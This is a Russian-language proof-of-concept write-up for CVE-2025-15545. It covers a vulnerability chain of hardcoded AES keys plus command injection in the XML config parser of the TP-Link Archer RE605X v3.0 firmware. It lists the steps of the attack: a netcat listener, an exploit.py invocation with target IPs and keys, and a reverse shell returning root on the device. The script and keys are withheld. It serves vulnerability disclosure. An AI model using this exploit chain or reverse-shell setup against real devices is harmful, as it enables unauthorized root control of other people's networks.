
Доказательство концепции для CVE-2025-15545
Производитель: TP-Link
Веб-сайт производителя: TP-Link
Модель: Archer RE605X
Версия оборудования: RE605X v3.0
Версия прошивки: RE605X(EU)_V3_1.1.5 Build 20240905
Адрес загрузки прошивки: TP-Link
Цепочка уязвимостей, включающая использование жёстко заданных криптографических ключей и внедрение команд в компоненте парсера XML-конфигурации, позволяет локальному аутентифицированному злоумышленнику добиться удалённого выполнения кода (RCE) с правами root на устройстве.
Примечание: Подтверждающая концепцию программа exploit.py демонстрирует сценарий цепной атаки и зависит от учётных данных аутентифицированного пользователя как дополнительного предварительного условия. Этот этап аутентификации не покрывается CVE-2025-15545 и включён только для демонстрации.
Прослушивайте входящие соединения в отдельном терминале:
$ nc -lvnp 4444
Выполните скрипт exploit.py:
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>
Примечание: aes_key и aes_iv — это жёстко заданные криптографические ключи, используемые устройством для шифрования и дешифрования файлов конфигурации, и они требуются для данной подтверждающей концепцию. По соображениям безопасности они не могут быть здесь раскрыты.
Реверс-шелл принимается на первом терминале:
$ nc -lvnp 4444
Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt
Эти уязвимости были сообщены Nicola Giuffrida.